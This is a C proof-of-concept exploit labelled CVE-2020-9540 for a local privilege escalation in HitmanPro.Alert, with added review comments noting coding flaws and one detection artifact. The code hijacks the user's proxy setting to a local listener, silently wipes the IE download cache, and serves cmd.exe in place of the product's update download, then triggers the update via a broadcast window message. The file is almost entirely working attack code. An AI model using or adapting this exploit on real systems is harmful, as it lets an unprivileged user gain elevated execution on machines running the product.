CVE-2020-9540.c
/*
HitmanPro.Alert insecure downloads LPE exploit PoC
*/
#include <Windows.h>
#include <ShlObj.h>
#include <WinInet.h>
#include <stdio.h>
#pragma comment(lib, "Ws2_32.lib")
#pragma comment(lib, "WinInet.lib")
/* Registry path (relative to HKCU) holding the per-user WinINet proxy settings
 * written by SetSystemProxy ("ProxyEnable" / "ProxyServer"). */
#define REG_INTERNET_SETTINGS "Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings"

/* A file image held in memory: filled by LoadSignedFile, served by FileServerLoop,
 * released by main() with HeapFree.
 * NOTE(review): the tag _DATA (leading underscore + uppercase) is an identifier
 * reserved for the implementation. */
typedef struct _DATA
{
    LPVOID FileBytes; /* heap buffer holding the file contents; caller frees it */
    DWORD FileSize;   /* length of FileBytes in bytes */
} DATA, *PDATA;
/*
State can be TRUE to turn the proxy on, or FALSE to turn it off
*/
/*
 * Writes the per-user WinINet proxy settings under HKCU\REG_INTERNET_SETTINGS.
 *
 * State        TRUE enables the proxy and stores ServerString in "ProxyServer";
 *              FALSE disables it and deletes "ProxyServer" (ServerString unused).
 * ServerString host:port string written to "ProxyServer" when State is TRUE.
 * Returns TRUE when the registry write(s) succeeded, FALSE otherwise.
 *
 * NOTE(review): for a REG_SZ value cbData should include the terminating NUL
 * (strlen + 1); the value is written here without it.
 * NOTE(review): RegDeleteValueA's result is not checked, so a missing
 * "ProxyServer" value is reported as success.
 * Detection: modification of ProxyEnable / ProxyServer under this HKCU key is
 * the observable artifact of this step.
 */
BOOL SetSystemProxy(BOOL State, LPCSTR ServerString)
{
    DWORD enableFlag = State ? 1 : 0;
    LONG rc;

    rc = RegSetKeyValueA(HKEY_CURRENT_USER, REG_INTERNET_SETTINGS, "ProxyEnable",
                         REG_DWORD, &enableFlag, sizeof(enableFlag));
    if (rc != ERROR_SUCCESS) {
        return FALSE;
    }

    if (enableFlag == 0) {
        /* Disabling: remove the server value; its result is not checked. */
        RegDeleteValueA(HKEY_CURRENT_USER, REG_INTERNET_SETTINGS, "ProxyServer");
        return TRUE;
    }

    rc = RegSetKeyValueA(HKEY_CURRENT_USER, REG_INTERNET_SETTINGS, "ProxyServer",
                         REG_SZ, ServerString, strlen(ServerString));
    return (rc == ERROR_SUCCESS) ? TRUE : FALSE;
}
/*
 * Deletes the contents of a folder below the caller's Local AppData directory.
 *
 * CachePrefix: path fragment (may carry a wildcard) appended to the
 *              CSIDL_LOCAL_APPDATA folder; main() passes the IE INetCache path.
 * Returns TRUE only when SHGetFolderPathA and SHFileOperationA both succeed.
 *
 * NOTE(review): HeapAlloc's result is not checked; a NULL return would be
 * handed straight to SHGetFolderPathA and strcat_s.
 * NOTE(review): lpPath is leaked on the SHGetFolderPathA failure path.
 * NOTE(review): strcat_s is told the destination is MAX_PATH bytes while the
 * allocation is MAX_PATH + strlen(CachePrefix); conservative, but inconsistent.
 * NOTE(review): SHFileOperation requires pFrom to be double-NUL-terminated;
 * that holds here only because HEAP_ZERO_MEMORY leaves the unused tail zeroed.
 * NOTE(review): SHFILEOPSTRUCT is the TCHAR variant paired with the explicit
 * ANSI SHFileOperationA; this compiles only in a non-UNICODE build.
 */
BOOL ClearDownloadCache(LPCSTR CachePrefix)
{
    SHFILEOPSTRUCT fileOp;
    LPVOID lpPath;
    ZeroMemory(&fileOp, sizeof(fileOp));
    /* Room for the folder path plus the appended prefix; zero-filled. */
    lpPath = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, MAX_PATH + strlen(CachePrefix));
    if (SHGetFolderPathA(0, CSIDL_LOCAL_APPDATA, NULL, SHGFP_TYPE_DEFAULT, lpPath) == S_OK)
    {
        strcat_s(lpPath, MAX_PATH, CachePrefix);
        fileOp.wFunc = FO_DELETE;
        fileOp.pFrom = lpPath;
        fileOp.pTo = lpPath; /* not used by FO_DELETE */
        /* Silent, unattended delete: no confirmation dialogs, no error UI. */
        fileOp.fFlags = FOF_NOCONFIRMATION | FOF_NOERRORUI | FOF_SILENT;
        fileOp.fAnyOperationsAborted = FALSE;
        if (!SHFileOperationA(&fileOp)) /* 0 means success */
        {
            HeapFree(GetProcessHeap(), 0, lpPath);
            return(TRUE);
        }
        else
        {
            HeapFree(GetProcessHeap(), 0, lpPath);
            return (FALSE);
        }
    }
    /* NOTE(review): lpPath is not freed here. */
    return (FALSE);
}
/*
 * Reads C:\Windows\System32\cmd.exe into a freshly allocated heap buffer.
 *
 * SignedFileData: receives the buffer in FileBytes (owned by the caller, to be
 *                 released with HeapFree) and its length in bytes in FileSize.
 * Returns TRUE when the file could be opened, FALSE otherwise. Whether the
 * read itself succeeded is not verified.
 *
 * NOTE(review): ReadFile is called with both lpNumberOfBytesRead and
 * lpOverlapped NULL, which the API does not permit for synchronous I/O; its
 * return value is ignored, as are those of GetFileSize and HeapAlloc.
 */
BOOL LoadSignedFile(PDATA SignedFileData)
{
    HANDLE hFile = CreateFileA("C:\\Windows\\System32\\cmd.exe", GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, 0);
    if (hFile == INVALID_HANDLE_VALUE) {
        return FALSE;
    }

    DWORD size = GetFileSize(hFile, NULL);
    LPVOID bytes = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, size);
    ReadFile(hFile, bytes, size, NULL, NULL);
    CloseHandle(hFile);

    SignedFileData->FileSize = size;
    SignedFileData->FileBytes = bytes;
    return TRUE;
}
/*
 * Thread body: a minimal TCP listener on port 8080, bound to all interfaces,
 * that replies with SignedFileData->FileBytes to the first connection whose
 * request contains "Host: get.hitmanpro.com", then closes everything and ends
 * the thread with ExitThread. main() points the per-user proxy at
 * 127.0.0.1:8080 so that WinINet traffic is routed here.
 *
 * NOTE(review): the signature does not match LPTHREAD_START_ROUTINE
 * (DWORD WINAPI fn(LPVOID)); main() passes &FileServerLoop to CreateThread anyway.
 * NOTE(review): socket, bind, listen, accept, recv and send results are not
 * checked; strstr may return NULL and strncmp would then dereference it.
 * NOTE(review): recv may fill all 0x5000 bytes, leaving no NUL for strstr.
 * NOTE(review): &recvBuff has type CHAR (*)[0x5000], not CHAR *; strstr is
 * handed a pointer of the wrong type.
 * NOTE(review): INADDR_ANY exposes the listener to every interface, not just
 * the local proxy client.
 */
VOID FileServerLoop(PDATA SignedFileData)
{
    struct sockaddr_in serverAddr;
    struct sockaddr_in clientAddr;
    WSADATA wsaData;
    SOCKET sockServer;
    SOCKET sockConnected;
    LPCSTR lpszHost;
    BOOL bBreak;
    CHAR recvBuff[0x5000];
    int sinSize;
    int optVal;
    WSAStartup(MAKEWORD(2, 2), &wsaData);
    sockServer = socket(AF_INET, SOCK_STREAM, 0);
    optVal = 1;
    /* Allow a quick rebind of 8080 if a previous run left it in TIME_WAIT. */
    setsockopt(sockServer, SOL_SOCKET, SO_REUSEADDR, &optVal, sizeof(optVal));
    serverAddr.sin_family = AF_INET;
    serverAddr.sin_port = htons(8080);
    serverAddr.sin_addr.s_addr = INADDR_ANY;
    memset(&(serverAddr.sin_zero), 0, 8);
    bind(sockServer, (struct sockaddr *)&serverAddr, sizeof(struct sockaddr));
    bBreak = FALSE;
    printf("[i] Server started on port 8080\n");
    /* Accept one connection per iteration; leave once the expected Host header is seen. */
    do {
        listen(sockServer, 5); /* re-issued every iteration; harmless but only needed once */
        fflush(stdout);
        sinSize = sizeof(struct sockaddr_in);
        sockConnected = accept(sockServer, (struct sockaddr *)&clientAddr, &sinSize);
        memset(&recvBuff, 0x00, sizeof(recvBuff)); /* zero so a short read is NUL-terminated */
        recv(sockConnected, recvBuff, sizeof(recvBuff), 0);
        //printf("Received:%s", recvBuff); // Debug
        lpszHost = strstr(&recvBuff, "Host: "); /* NULL if the header is absent */
        if (!strncmp(lpszHost, "Host: get.hitmanpro.com", 23))
        {
            bBreak = TRUE;
            /* Whole buffer in one send; partial sends are not handled. */
            send(sockConnected, SignedFileData->FileBytes, SignedFileData->FileSize, 0);
        }
        closesocket(sockConnected);
    } while (!bBreak);
    closesocket(sockServer);
    WSACleanup();
    ExitThread(0); /* terminates the thread; this function never returns */
}
/*
 * Entry point. Runs the steps in order, each only if the previous returned
 * TRUE, and always ends with the "Press enter" prompt:
 *   1. disable, then enable the per-user proxy at 127.0.0.1:8080 and ask
 *      WinINet to reload its settings;
 *   2. purge the IE INetCache folder;
 *   3. load the file FileServerLoop will serve;
 *   4. start the listener thread, pause, broadcast message 0x111 (WM_COMMAND)
 *      with wParam 0x3FC, and block until the thread exits;
 *   5. free the buffer and disable the proxy again.
 *
 * NOTE(review): `void main()` is not a standard signature; `int main(void)` is.
 * NOTE(review): if step 2 or 3 fails after step 1, the proxy is left enabled
 * and pointed at 127.0.0.1:8080; nothing restores the previous setting.
 * NOTE(review): CreateThread's result is not checked and hServer is never
 * closed; WaitForSingleObject on a NULL handle fails immediately.
 * NOTE(review): the 1500 ms Sleep is a timing assumption, not a handshake
 * with the listener thread.
 */
void main()
{
    HANDLE hServer;
    DATA dSignedFile;

    if (!SetSystemProxy(FALSE, "")) {
        goto prompt;
    }
    if (!SetSystemProxy(TRUE, "127.0.0.1:8080")) {
        goto prompt;
    }
    InternetSetOption(NULL, INTERNET_OPTION_SETTINGS_CHANGED, NULL, 0);
    InternetSetOption(NULL, INTERNET_OPTION_REFRESH, NULL, 0);
    printf("[i] Set system proxy\n");

    if (!ClearDownloadCache("\\Microsoft\\Windows\\INetCache\\IE\\*")) {
        goto prompt;
    }
    printf("[i] Cleaned download cache\n");

    if (!LoadSignedFile(&dSignedFile)) {
        goto prompt;
    }
    printf("[i] Loaded signed file\n");

    hServer = CreateThread(NULL, 0, &FileServerLoop, &dSignedFile, 0, NULL);
    Sleep(1500); /* per the original comment: give the listener time to start */
    SendMessageA(HWND_BROADCAST, 0x111, 0x3FC, 0); /* original comment: "Update message to Hitmanpro.Alert" */
    WaitForSingleObject(hServer, INFINITE);
    printf("[i] Exploit complete\n");

    HeapFree(GetProcessHeap(), 0, dSignedFile.FileBytes);
    if (SetSystemProxy(FALSE, "")) {
        printf("[i] Removed system proxy\n");
    }

prompt:
    printf("[.] Press enter to exit\n");
    getchar();
    return;
}